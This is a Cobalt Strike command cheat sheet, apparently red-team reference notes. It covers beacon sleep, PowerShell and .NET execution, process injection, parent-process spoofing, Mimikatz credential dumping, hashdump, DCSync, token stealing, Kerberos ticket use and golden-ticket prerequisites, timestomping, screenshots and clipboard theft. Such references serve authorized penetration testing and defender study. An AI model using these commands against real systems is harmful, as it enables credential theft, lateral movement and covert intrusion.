Command Reference

Beacons

Sleep

sleep 60 50               ; Sleep 60 sec with 50% of jitter (Call back between 30 to 60 secs randomly)

Command Execution

Default

run [command]

powershell.exe

powershell-import [/path/to/your.ps1]       ; Running it from your localhost
powershell [cmdlet] [args]

powerpick (Using PS w/o powershell.exe)

powrepick [cmdlet] [args]

psinject (Using PS within another process)

psinject [PID] [x86|x64] [cmdlet] [args]

.NET

execute-assembly [/path/to/your.exe]        ; Running it from your localhost

cmd.exe

shell [command] [args]

Session Passing

spawn [x86|x64] [Listener]
inject [PID] [x86|x64] [Listener]

Parent Process Modification

ppid [Choice of your parent process (e.g., iexplore.exe)]
spawnto [x86|x64] [New parent process]

SMB Beacn

spawn [SMB-Listner-Name]                    ; Spawning a peer-to-peer ("P2P") SMB beacon
inject [PID] [x86|x64] [SMB-Listner-Name]   ; Useful when trying to spawn P2P beacon as different user context

TCP Beacn

spawn [TCP-Listner-Name]                    ; Spawning a peer-to-peer ("P2P") TCP beacon
                                            ; TCP beacons can be also run locally by clicking "Bind to localhost only" on GUI
inject [PID] [x86|x64] [TCP-Listner-Name]   ; Useful when trying to spawn P2P beacon as different user context

Credentials and Hashes

logonpasswords                              ; Run Mimikatz
hashdump                                    ; Get SAM database hashes

Mimikatz

mimikatz [command] [args]                   ; Runs a Mimikatz command
mimikatz ![command] [args]                  ; Elevate to SYSTEM and run Mimikatz command
mimikatz @[command] [args]                  ; User current token to run Mimikatz command

DCSync

dcsync [domain] [DOMAIN\user]

File Download

download [file]
cancel [file|*]
downloads
View --> Downloads --> Sync Files

File Upload

upload [/path/to/file]
timestomp [Destination] [Source]            ; Changing file's timestamps (*Do not recommend using it during the engagement)

Token Stealing

ps                                          ; List process
steal_token [PID]                           ; Stealing token
getuid                                      ; Identify/confirm who you are
rev2self                                    ; Drop/revoke token

spawnas DOMAIN\user password                ; Spawn a beacon w/ alternative creds
make_token DOMaIN\user password             ; Create a token. So when you do a make_token, when you do 'whoami' you will
                                            ; still see your current user account; however, if you do a remote 'whoami'
                                            ; (maybe against DC) you will see that the maked token user.

Kerberos Tickets

klist                                       ; See your current Kerberos tray
kerberos_ticket_purge                       ; Purge tickets
kerberos_ticket_user [/path/to/file.ticket] ; Load a ticket

<Golden Ticket>
- Desired user and DOMAIN name
- Domain SID [whoami /user + drop last number]
- NTLM hash of krbtgt user from DC

Screenshots

screenshot [pid] <x84|x64>
screenwatch [pid] <x84/x64>
printscreen

Keylogging / ClipboardTheft

psinject <Process ID> x64 Start-ClipboardMonitor -CollectionLimit 5

Last updated